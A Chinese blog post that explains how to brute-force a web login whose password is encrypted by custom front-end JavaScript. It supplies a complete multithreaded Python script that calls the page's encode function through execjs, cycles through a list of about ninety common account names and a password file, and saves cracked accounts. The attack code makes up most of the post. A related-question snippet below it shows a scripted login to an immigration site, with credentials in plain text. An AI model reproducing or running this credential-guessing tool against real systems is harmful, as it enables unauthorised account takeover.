绕过前端加密进行爆破(附脚本)

在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下:

这里写图片描述

可以看到加密的函数主要是encode,所以每个密码都由自定义函数加密。

这里写图片描述

最近在实战过程中get到一个new trick,利用相应的工具或者模块执行该 js 文件,拿到输出结果即可,可以使用 python 自带的execjs。

安装

先安装 execjs
pip install PyExecJS

将js代码保存在本地。

#coding:utf-8
from selenium import webdriver
import  execjs

with open ('test.js','r') as jj:
    source = jj.read()
    phantom = execjs.get('PhantomJS')
    getpass = phantom.compile(source)
    mypass = getpass.call('encrypt', 'admin','admin123')
    print mypass

利用以上代码可获得相应的密码。

爆破

自动化走起,写了一个python脚本进行渗透爆破。

#coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import requests
import re
import base64
import time
import random
import threading
from selenium import webdriver
import  execjs

def brute(user,password,UA):
        url = 'http://xxx/login'
        with open('test.js', 'r') as jj:
            source = jj.read()
            # phantom = execjs.get('PhantomJS')
            phantom = execjs.get()
            getpass = phantom.compile(source)
            print user, password
            mypass = getpass.call('encode', user, password)
            passwd = mypass
            print passwd
        post_data = {}
        post_data['userName'] = user
        post_data['userPass'] = passwd
        post_data['verifyCode'] = 'dsvx'
        headers ={
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "http://xxx/",
        "Connection": "close"}
        resp = requests.post(url=url,data=post_data,headers=headers)
        print user+"#"+password+" "+resp.content
        if not resp.content.find(u'请检查账号和密码') > 0 :
            print '*** find user:', user, 'with password:', password, '***'
            with open('accounts-cracked.txt', 'a+') as f:
                f.write(user + '    ' +  passwd + '\n')



def main():
    tsk = []
    user_list = ['admin','noreply','hr','jobs','qiniu','lietou','demo','ceo','dev','root','service','fuwu','yunying','webmaster','wechat','weixin','weibo','tec','bd','bf','op','shop','test','pm','kefu','cdn','marketing','zhaopin','suggestion','warning','risk','system','pay','payment','management','feedback','guanli','ci','ad','td','news','cert','sdk','pmd','appstore','development','it','fankui','notify','bugs','security','sec','alipay','yunwei','message','support','ceshi','developer','notice','redmine','alert','kaifa','seo','git','vpn','jenkins','jira','zabbix','chandao','nagios','monitor','account','jubao','backup','open','openapi','github','reload','blacklist','buyer','caiwu','order','postmaster','pr','report','public','download','som','ops','devops','caigou','pmp','monit']
    f1 = open('pass2.txt','r')
    for i in f1.readlines():
        password = i.strip()
        for j in user_list:
            user = j
            UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"
            t = threading.Thread(target = brute,args = (user,password,UA))
            tsk.append(t)
    for t in tsk:
        t.start()
        t.join()#阻塞(0.1)


if __name__ == '__main__':
    main()

效果图:

这里写图片描述

参考:
https://segmentfault.com/a/1190000010179232

发布了20 篇原创文章 · 获赞 11 · 访问量 13万+
展开阅读全文

python模拟浏览器登录,登录成功后的操作无效,dai码贴出,请帮我看看.

07-06

``` #coding=utf-8 import urllib import urllib2 import cookielib import re import sys reload(sys) sys.setdefaultencoding("utf-8") #登录页面,获取登录所需cookie print u'打开登录页面' url = "https://www.immigration.govt.nz/secure/Login+Working+holiday.htm" cookiejar = cookielib.CookieJar() urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) headers = { 'Accept':'text/html, application/xhtml+xml, */*', 'X-HttpWatch-RID': '9765-10012', 'Referer': 'https://www.immigration.govt.nz/', 'Accept-Language': 'zh-CN', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', # 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate', 'Host': 'www.immigration.govt.nz', # 'Content-Length': '382', 'Connection':'Keep-Alive', 'Cache-Control': 'no-cache' } request = urllib2.Request(url,headers=headers) opener = None opener = urlOpener.open(request) #解析隐藏字段 获取认证字符 cookie里面有一项 immigrationAuth,必须携带此项才能登录成功 print u"获取认证字符" htmlCode = opener.read() partten = re.compile(r"<[ ]*input[ ]+.*?>") tags = re.findall(partten, htmlCode) partten = re.compile(r"<[ ]*input[ ]+.*name[ ]*=[ ]*[\"|\'](.*?)[\"|\'][ ]+.*value[ ]*=[ ]*[\"|\'](.*?)[\"|\'].*?>") data = {} for tag in tags: param = re.findall(partten, tag) if param: data[param[0][0]] = param[0][1] data['OnlineServicesLoginStealth:VisaLoginControl:passwordTextBox'] = 'Zz45509' data['OnlineServicesLoginStealth:VisaLoginControl:userNameTextBox'] = 'testing___9' data['VisaDropDown'] = '/secure/Login+Working+Holiday.htm' data['OnlineServicesLoginStealth:VisaLoginControl:loginImageButton.x'] = '21' data['OnlineServicesLoginStealth:VisaLoginControl:loginImageButton.y'] = '15' data['HeaderCommunityHomepage:SearchControl:txtSearchString'] = '' params = urllib.urlencode(data) #print params url = "https://www.immigration.govt.nz/Templates/Secure/Login.aspx?NRMODE=Published&NRNODEGUID=%7bB9707666-55BB-49F9-BA1E-7341EA3B877C%7d&NRORIGINALURL=%2fsecure%2fLogin%2bWorking%2bholiday%2ehtm&NRCACHEHINT=Guest" request = urllib2.Request(url,headers=headers) opener = urlOpener.open(request, params) cookies = '' cookieList = ['ASP.NET_SessionId','ImmigrationAuth','TS0120d49b'] for cookie in cookiejar: if cookie.name in cookieList: cookies = cookies+cookie.name+"="+cookie.value+";"; print cookie.name+"="+cookie.value cookie = cookies[:-1] #delete the last character #携带认证登录 print u"携带认证登录" url = 'http://www.immigration.govt.nz/migrant/default.htm' request = urllib2.Request(url,headers=headers) request.add_header("cookie",cookie) opener = urlOpener.open(request, params) value = opener.read().find("username") if value > -1: print u"登录成功" cookies = '' cookieList = ['ASP.NET_SessionId','ImmigrationAuth','TS0120d49b'] for cookie in cookiejar: if cookie.name in cookieList: cookies = cookies+cookie.name+"="+cookie.value+";"; print cookie.name+"="+cookie.value cookie = cookies[:-1] #delete the last character #打开提交页面,就是此处登录成功后打开这个页面失败,但是手动打开网页,单独写一个脚本,再把cookie复制进去,却可以成功打开这个页面 #请教过其他人,是说登录的时候,js生成了一个csrf_token,必须计算出这个token,才能登录成功后继续操作 print u"打开提交页面" url = 'https://www.immigration.govt.nz/WorkingHoliday/Application/Submit.aspx?ApplicationId=1302903' request = urllib2.Request(url) request.add_header("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0") request.add_header("cookie",cookie) request.add_header('Host','www.immigration.govt.nz') request.add_header('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8') request.add_header('Accept-Language','zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3') request.add_header('Accept-Encoding','gzip, deflate') request.add_header('Connection','keep-alive') opener = None opener = urlOpener.open(request) print opener.read().find("IMPORTANT NOTE") if opener.read().find("IMPORTANT NOTE") == -1 : print u"打开提交页面失败" ``` 打印信息 ![图片说明](https://img-ask.csdn.net/upload/201507/06/1436174652_790989.png) 问答

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览